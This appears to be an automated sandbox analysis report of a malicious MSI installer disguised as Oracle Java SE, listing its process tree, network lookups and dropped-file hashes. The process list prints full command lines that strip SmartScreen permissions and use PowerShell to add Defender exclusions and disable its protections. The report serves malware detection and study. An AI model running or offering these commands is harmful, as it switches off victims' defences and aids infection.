PID 1876 wrote to memory of 3988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1876 wrote to memory of 3988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1876 wrote to memory of 3988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 5008 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 5008 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 5008 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 4388 N/A C:\Windows\syswow64\cmd.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
PID 4324 wrote to memory of 4388 N/A C:\Windows\syswow64\cmd.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
PID 4324 wrote to memory of 4388 N/A C:\Windows\syswow64\cmd.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
PID 4324 wrote to memory of 3888 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 3888 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 3888 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 4348 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 4348 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 4348 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 552 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 552 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 552 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 4516 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 4516 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 4516 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 2660 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 2660 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 2660 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 1612 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 1612 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 1612 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 3608 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 3608 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 3608 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 4528 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 4528 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 4528 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 4832 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\1d2fdd9c09c8452e9c88222f2c16806a_JaffaCakes118.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 707185549E31D1DBD77E92FD1C1AA14B

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 69E98055858974A0BC153E97A3A971BB E Global\MSI0000

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe

"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe"

C:\Windows\syswow64\cmd.exe

"cmd.exe" /C "C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat"

C:\Windows\SysWOW64\takeown.exe

takeown /f "C:\Windows\System32\smartscreen.exe" /a

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\System32\smartscreen.exe" /reset

C:\Windows\SysWOW64\taskkill.exe

taskkill /im smartscreen.exe /f

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionExtension ".dll""

C:\Windows\SysWOW64\cmd.exe

cmd /c powershell.exe -command "Set-MpPreference -MAPSReporting 0"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -MAPSReporting 0"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -PUAProtection disable"

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe

Register.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"

Network

Country Destination Domain Proto
US 8.8.8.8:53 repository.certum.pl udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
GB 2.22.249.67:80 repository.certum.pl tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 67.249.22.2.in-addr.arpa udp
US 8.8.8.8:53 27.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 45.249.22.2.in-addr.arpa udp
US 8.8.8.8:53 vivacemusic.site udp
US 8.8.8.8:53 vivacemusic.site udp
US 8.8.8.8:53 vivacemusic.site udp
US 8.8.8.8:53 vivacemusic.site udp
US 8.8.8.8:53 vivacemusic.site udp
N/A 127.0.0.1:60817 tcp
N/A 127.0.0.1:60820 tcp
N/A 127.0.0.1:60823 tcp
N/A 127.0.0.1:60826 tcp
N/A 127.0.0.1:60830 tcp
US 8.8.8.8:53 67.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 136.71.105.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6C27B6DA8C60D333DD161137481B772E_8D2705640D941B859369EC71AB80665B

MD5 d594524b9c081a8c600afd725d9ab3ad
SHA1 9fa3cb863fdf41273b02c381a01565a764fbd0de
SHA256 a84c97e884df6d40003e5256e40118e5e5f5575ad5039e614dd997a92a9a5230
SHA512 5a43d5a2a91394538cdc3d771ca035e6b353a0f3da9dc078d9a2eea047c7fb7399755155b1ef763be351d2cb8e3fe8dfcaf72c42ae87c7a6b0ccaf40a3a3b5cb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6C27B6DA8C60D333DD161137481B772E_8D2705640D941B859369EC71AB80665B

MD5 6dc6905a6d95ce365a671ab8dc82fa6b
SHA1 f21a03a87c7349422a276a53c00c88f010d7b184
SHA256 12208ef455e048f59ce2738b65c46fea4841db302408285b0bbd7fb15f6afc2b
SHA512 a0386ce09ef882362f5f829a9bc297fd151dc3e742747739cee2ff4ac737301e354ad464af7cfd6c81cb5fc84ce7764a7e21af0e50b66d0b5344b158470fa43c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\68FAF71AF355126BCA00CE2E73CC7374_2FC60472190717C9030A3B22E7C17DF4

MD5 b04dfc64dabfe7710377ebccff748e25
SHA1 f91cfb0d95fc3bc789e15bfa05b826bb01a0ec16
SHA256 2218a64866292c09559ddabb7a1cceae04acb60091f73bcfb780d20e53cee959
SHA512 6f147634ae21ea44fa897aad299773a8d158fbf690cc3b04ef0b75d3892984bf1213e5691f5a7da6e9d056384cac51b7e21970f6db5b5d24e7fdbe5d3c261254

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\68FAF71AF355126BCA00CE2E73CC7374_2FC60472190717C9030A3B22E7C17DF4

MD5 3a40f48b697892e246893282bb93ac49
SHA1 708c905147a4813f7e8849a424dfa18c2b8ac4cf
SHA256 ee517a912087ea204e9e20c036b55e8739806052b210b644d74ed4997bff13b7
SHA512 b09803e1fa3e611e0135f2fdd51331131509f48843a74e12caa579199fac655064dc38c4db278488c0023d23dd6a27233a6bbdd1ce8778779df6e6a339b00e83

C:\Windows\Installer\MSIA46F.tmp

MD5 a3ae5d86ecf38db9427359ea37a5f646
SHA1 eb4cb5ff520717038adadcc5e1ef8f7c24b27a90
SHA256 c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74
SHA512 96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe

MD5 36b24a4deb93b2af6da9dba72eefaa5f
SHA1 8c55de3fa1269f4fdba9a5c701c5daad84d59f38
SHA256 d3370bb63c1908550c49601fcc664313809fcb68fdfdb81ef8129fe465a254d2
SHA512 572355b5ab4fd349c71aaf66d5a1232e48ee697bb96b84b6656dc6b6c64f7c8098e00772e1b519805bb441159281ec5f90ff91a20ed17597704bf2492f8fff9d

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140_1.dll

MD5 1e109b1d40efcfec81a5d43d318cbb26
SHA1 03aae193dc36d70fb34257d1276666e988b4a222
SHA256 0f04b4cb12543687d8416dfc307593a1dbc450939fd7980d124fed4144732d69
SHA512 762bb0fa8528936c8cfbd05e8beb557b9d751f3850124b3dcec102e3cd55550408666ffb27fea5472420ea40d95453279769765eee8f94ed2afa3d721018e1c4

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140.dll

MD5 e008fbfdea1bf873f3d94d74c1cf7935
SHA1 2a2af5e9084e7b55cdd5d01df342b02c1917573c
SHA256 678f9d715220512a823ca45d7e8545a1288728d8d47243e072e17049441cdd2b
SHA512 145acb67ab06dc90e5c7ed89623a339f595998af683bf47d665ffa23b05f9b87016b3ae5777c2c45f53b91a757e510b0f5aa5a9b908d79df3d566b2307d9d3d0

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\MSVCP140.dll

MD5 9dda681b0406c3575e666f52cbde4f80
SHA1 1951c5b2c689534cdc2fbfbc14abbf9600a66086
SHA256 1ecd899f18b58a7915069e17582b8bf9f491a907c3fdf22b1ba1cbb2727b69b3
SHA512 753d0af201d5c91b50e7d1ed54f44ee3c336f8124ba7a5e86b53836df520eb2733b725b877f83fda6a9a7768379b5f6fafa0bd3890766b4188ebd337272e9512

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll

MD5 b3c188281aa3998f49391da0c3b52b8e
SHA1 67e6f1eb07861dddde3df9d266f683cb0331d433
SHA256 59481427f4dad6460ac60c7619f628d6b7fad33562bbd8dc9145715ebb300e46
SHA512 42d7a71d4ce1e0c6ea50ddbf960b6f0d25b32526604295f50688bf4770db7338d4b32f0dda738ae147def66788497537f708becdeb720e299c614c28fe824665

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll

MD5 888aa12cc20f645dd2fc04f52e453bc6
SHA1 b19e790c9e6ceface9cdd41a24518d6e4a953b23
SHA256 93e2aa20251e1a0485828c3e29b60e17ff2f3ec1285455d059ffe1b1a24518eb
SHA512 f7d7a67244ff4f9a269461b49cdcd44d923840154447ca7ace61ef8167b79605c2f3c29a1d607b44831e68a696ef219710c4f1658a6fa73e564b7f252b031dc3

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat

MD5 c41305cebcf71d9369f6af4b57c8bbca
SHA1 4a8245d040f781ed14541af314588cc7cdba793b
SHA256 d2471d2070a7cbd5f1903d03fa1e33418e72129a2721a14c038810f11510a2f7
SHA512 e530516f97c5130a97dfa4e134d850ff97ad46f88789d3cb1ba91fa3fa504a27be6f284506bbd3fe1924b0f9d16ea4571fdb4fe835873668295622e1243b15f5

memory/3988-78-0x0000000002DD0000-0x0000000002E06000-memory.dmp

memory/1712-79-0x0000000004E90000-0x00000000054B8000-memory.dmp

memory/3752-80-0x0000000005490000-0x00000000054B2000-memory.dmp

memory/3988-81-0x0000000005AB0000-0x0000000005B16000-memory.dmp

memory/3752-87-0x00000000056D0000-0x0000000005736000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1qmzq2i1.j5k.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3752-102-0x0000000005E90000-0x00000000061E4000-memory.dmp

memory/3988-111-0x0000000006350000-0x000000000636E000-memory.dmp

memory/3988-112-0x0000000006380000-0x00000000063CC000-memory.dmp

memory/3752-115-0x000000006FC80000-0x000000006FCCC000-memory.dmp

memory/1712-114-0x000000006FC80000-0x000000006FCCC000-memory.dmp

memory/1712-113-0x0000000006C70000-0x0000000006CA2000-memory.dmp

memory/1712-130-0x0000000006CB0000-0x0000000006CCE000-memory.dmp

memory/3988-136-0x000000006FC80000-0x000000006FCCC000-memory.dmp

memory/1712-135-0x0000000006CD0000-0x0000000006D73000-memory.dmp

memory/3988-147-0x0000000007690000-0x00000000076AA000-memory.dmp

memory/3988-146-0x0000000007CD0000-0x000000000834A000-memory.dmp

memory/3752-148-0x00000000077C0000-0x00000000077CA000-memory.dmp

memory/1712-149-0x0000000007090000-0x0000000007126000-memory.dmp

memory/3988-150-0x0000000007890000-0x00000000078A1000-memory.dmp

memory/1712-151-0x0000000007030000-0x000000000703E000-memory.dmp

memory/3752-152-0x00000000079A0000-0x00000000079B4000-memory.dmp

memory/3988-153-0x00000000079E0000-0x00000000079FA000-memory.dmp

memory/3988-154-0x0000000007910000-0x0000000007918000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0ff575baec38758fd4fc88d1b28acbfa
SHA1 29902309c070efa5dd9cc33d5c32da258670c3f4
SHA256 c824d34567ff7149502eaee52f159ccfa37ae41f434259af51ce6958e54cd988
SHA512 bd3046c02fdfd6dce0cd7ebd9ccb6e8e7ca3589c6964012f2b0574e700712cb50e2059f182b43f681177c33f83582092fda337adf3c5da41538a93c8992d4d55

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7fb62ca91e9ad74aca6fc767b900945c
SHA1 272045782426d95b66e100d0ace1c36d7d076c8d
SHA256 a902d8973165b7c6fc4656d8e13a619da2feea017ba9d830400240bfdcd8f8e9
SHA512 f96d4d6a05c665e890257fb84dc61923474d31e1858da9c149d2b9a9d14053d3a42579a08e8ce80c2dfc186564649999ed7c527fa9cc446f859e90c543eb7dbb

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe

MD5 96b62cfb83cf0e9790a3ef939173ee31
SHA1 23ecaefa21524e9446ea16e1f532f8bf9c5a56f1
SHA256 6fe23163ea43ab8d9e84fed45b8590fe643d599c7f218ea05d505e3aeea86f23
SHA512 d018997c50702fe035bd3974180f274ffa34605bd19a3ce8fbabf96633794afe8f1ee4a2ee731a9ff3c73163e45ad26f8d7bac30b9ae55d1d47c8a333b657b6b

memory/4516-174-0x00000000054F0000-0x0000000005844000-memory.dmp

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll

MD5 e7fcab954f116c8bb4b006145c20dd23
SHA1 91ee70a33ab12618f0f0ec229de4583d9aa52a8a
SHA256 e52b21f458c61dab957fea7286544a0c6531a4caf5c97c323eea10a61a0b38b2
SHA512 d5cf56a35697b4afd88721f7c60156fd5b1ef7b659e8fe5e98db79f8fa41b394662bc4182b41af1a5a029ec3b04c909629db83d146683ca382958199f6ea73b9

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll

MD5 2e68a858f54dda699080af452da69e39
SHA1 32a47540728cca729da3972f180c5c70042f0aca
SHA256 8c9889fad72842cd414738b8ef1915563d29e85e6defc1b147ea8864015a1d7b
SHA512 7754cbc50dd27553ca61206cb4cbe3ca36d3299ba31ce342ac293507cd445f68acec918602b35fb727132b9dd348c97575e21742c781a04cdceb22fea467851d

memory/4516-284-0x0000000005C20000-0x0000000005C6C000-memory.dmp

memory/4516-316-0x000000006F610000-0x000000006F65C000-memory.dmp

memory/4516-326-0x0000000006DD0000-0x0000000006E73000-memory.dmp

memory/3888-327-0x000000006F610000-0x000000006F65C000-memory.dmp

memory/4348-337-0x000000006F610000-0x000000006F65C000-memory.dmp

memory/1612-347-0x000000006F610000-0x000000006F65C000-memory.dmp

memory/4528-367-0x000000006F610000-0x000000006F65C000-memory.dmp

memory/552-357-0x000000006F610000-0x000000006F65C000-memory.dmp

memory/2660-387-0x000000006F610000-0x000000006F65C000-memory.dmp

memory/4832-397-0x000000006F610000-0x000000006F65C000-memory.dmp

memory/3608-377-0x000000006F610000-0x000000006F65C000-memory.dmp

memory/4516-417-0x0000000007120000-0x0000000007131000-memory.dmp

memory/4480-407-0x000000006F610000-0x000000006F65C000-memory.dmp

memory/420-419-0x000000006F610000-0x000000006F65C000-memory.dmp

memory/3032-429-0x000000006F610000-0x000000006F65C000-memory.dmp

memory/2224-441-0x000000006F610000-0x000000006F65C000-memory.dmp

memory/3396-439-0x000000006F610000-0x000000006F65C000-memory.dmp

memory/3480-459-0x000000006F610000-0x000000006F65C000-memory.dmp

memory/3600-469-0x000000006F610000-0x000000006F65C000-memory.dmp

memory/4516-479-0x0000000007160000-0x0000000007174000-memory.dmp

memory/3000-480-0x00007FFA80910000-0x00007FFA80D90000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4db5aa714df95aedea3dfa0aeffba86e
SHA1 b9f0356863d8c92fdba288de646abf9ffcff2084
SHA256 6299ec59bcbcf3c9bd10720e3268f1e0b9a1c6a1b88a734f61653d63a9df9c65
SHA512 73ccd94cd62ffe7d34e03c021fac7f27fe47582dcaa36b02de3ce2624b45a66887b75a865bf1d22d645b1288f7804e4a918272603af322dc9ed8bbb9cf246cc8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6cb9420fb2ad84212412db196018d265
SHA1 f4cc72376c0d9defc2a6ceacdde12c334d297f98
SHA256 8dd9e7fce514a3da2cc70e5e9f770d3b219e2e45a921332b9f9fcdaf42bb43bb
SHA512 42966079f426ed980ce1a40907337689226508816738d46c714c406d252e645dbb22ad27771fabdacec4b3a99c60c8ae4b3e474887b002eecc4a8350128ba783

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a373b8f003df153d15f671b9d6ed0c1f
SHA1 7812c002f0c577c63f04d8767f623641b9935eeb
SHA256 1d63eef9e0d0bacbd5859d8da5a72308920a6b4e785f1b530f26fc2426bcef07
SHA512 14641b254ea96940cc691b8fdf62f80256a651ca4a422b43ba7ae8d680ba9d76c4b8a4c0b1f77bdfe132090b5ff60a5d17ea15fc1a08d4657304ae7978ab4bca

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2a59a7ebbf06330f2a1e4fb146939c8a
SHA1 595921c3a32e1fa25a540e547712bd03c4e3b503
SHA256 f29240f7642cb1544ce9dbff87a7efc1f216e2cb6517cca7329c4c14ed148f53
SHA512 1bdc25e1f8a3e830a99076af9f030332246c311d08476bc4b4f51be23d3088310575808d149db98ca4f75dfb8ca236bcfe67dbba46ceabdf24480541321f192e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 70dc12e7ba0e5f21403b60415229231f
SHA1 c3c30852aef9bef3127e9944dd333104817d63b7
SHA256 01aa53e0f1c5b6f6b85d242427ef5386e8afa2bdb8046280ddf957e72355c39d
SHA512 fcec8183747dc7bbde32e581afc054b83e7d4f44797871dfbdbcab6a5ba80e2d384283855c529a6d269624f847ff5803dc3c0f7ce1212aedf8f39fd8ee5a7b6b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9d78ece7758f31d1851d458deba14430
SHA1 14e785c4245fc139711c5723f1033a27acf5c43f
SHA256 9cfbfabea93c71d3697f277721ec0c68984717182e9ec41f470fb3b08c059a14
SHA512 84211728968352238a459681cebdbcd2d504fc1a568bbc27cb5488923c57c1ef9bfbae18ee2e1075f409609ec6ec2754f11aab6767d440ecb225972318f51d4b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 85d9a7d326ab6e475670b8b87e46a05a
SHA1 9e99ec99a5c2af75e81ec489cb7888feb730fc48
SHA256 bfea3e8d747f2cf88087355e34431fc88a78d1cdbe14c04bf701cd9516f03a40
SHA512 7b9598de902bd5c199e6b1bbf7e14028dff66baae2f7a3e2b23fca7b7896e1964eb0d0616a736f1bf2a0fcabc34c678e2fdc333e3f3696d838afccfabe32f01c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3ada02612e67f1c40b90dc1c6843a2f9
SHA1 223cab9cc26350d757e9c8fb1f4d0b86fad7a318
SHA256 c0ab05a51565b5460d943d4716f3a3736a8ba0355f2debc99228bbff7b187e93
SHA512 2c4a2b70e9c212a654ebe78911357e0e089344c073e1e4dbba7c1dbb8dbcc389f7f726f07c1f1cd949ec54a4bea71910f6682185f7a226294e0e6b4df8538c3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1caf3595ce8ebc134da8216f111aeb19
SHA1 a2102e690189fa00af8b08225608eba04a61ed04
SHA256 90a80a7379ebee20349f478bc5648531f6a82d8dd5b6a8d8d89cea09fa2805c0
SHA512 0752be235720018a30e40b88adea8f2c8f898ed371f4554a638d1137e8360f6641928ebf3a6e4d979ea022834def43e0c31a844d9f13c0935d6698708b34ebeb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5ca3e16b506d7d705d6b433e626a5d53
SHA1 9d990877202ba05ff36e24aa2fe359301036e7ba
SHA256 c4287a99073aa0adc0a6156a51304b8f36fc5bae3cbce6d248d3d95fb8d40600
SHA512 bc74d45b8d35212bc1ff421572bc04c6433e4d261a96deb71af39303498f60588a51757e54dcafe24234de898f7b195388bf37413e1b957fde47d66d7d5171f9

C:\Config.Msi\e57a2e8.rbs

MD5 dcca9d4c5add35582b45d57be11f1492
SHA1 7ff7cf46e46f214061cae58f6f0b5126c1964a8a
SHA256 d8bf969f7c260719a5ccec87374cc918e227588216ced40f8c4b300fd8e2b847
SHA512 96718b1440abfb41ebb794bce7dbe6b18bc84e6adeb414284d8451d45339f4e2da4c3b1a36bf9d41ea737d4024111b399688c45df208204ec2cda8b86b28dc6e

C:\Windows\Installer\e57a2e7.msi

MD5 1d2fdd9c09c8452e9c88222f2c16806a
SHA1 5852958feca13943a937f638a0ea6cfb59307574
SHA256 7e657b695a46ef1719ec2f8baedbb9227b9de9591dcb66db7e99539fff1888d5
SHA512 4af7abc59c5dcfa065b858b1cb6a5a89f2e79d777acbcc5c7fc57175e20973bad0712f4d9adcb5eeec7bd8c44c90e255f4e22ba9035f2a82d1e8cc45aea87fb1

memory/3000-520-0x00007FFA80910000-0x00007FFA80D90000-memory.dmp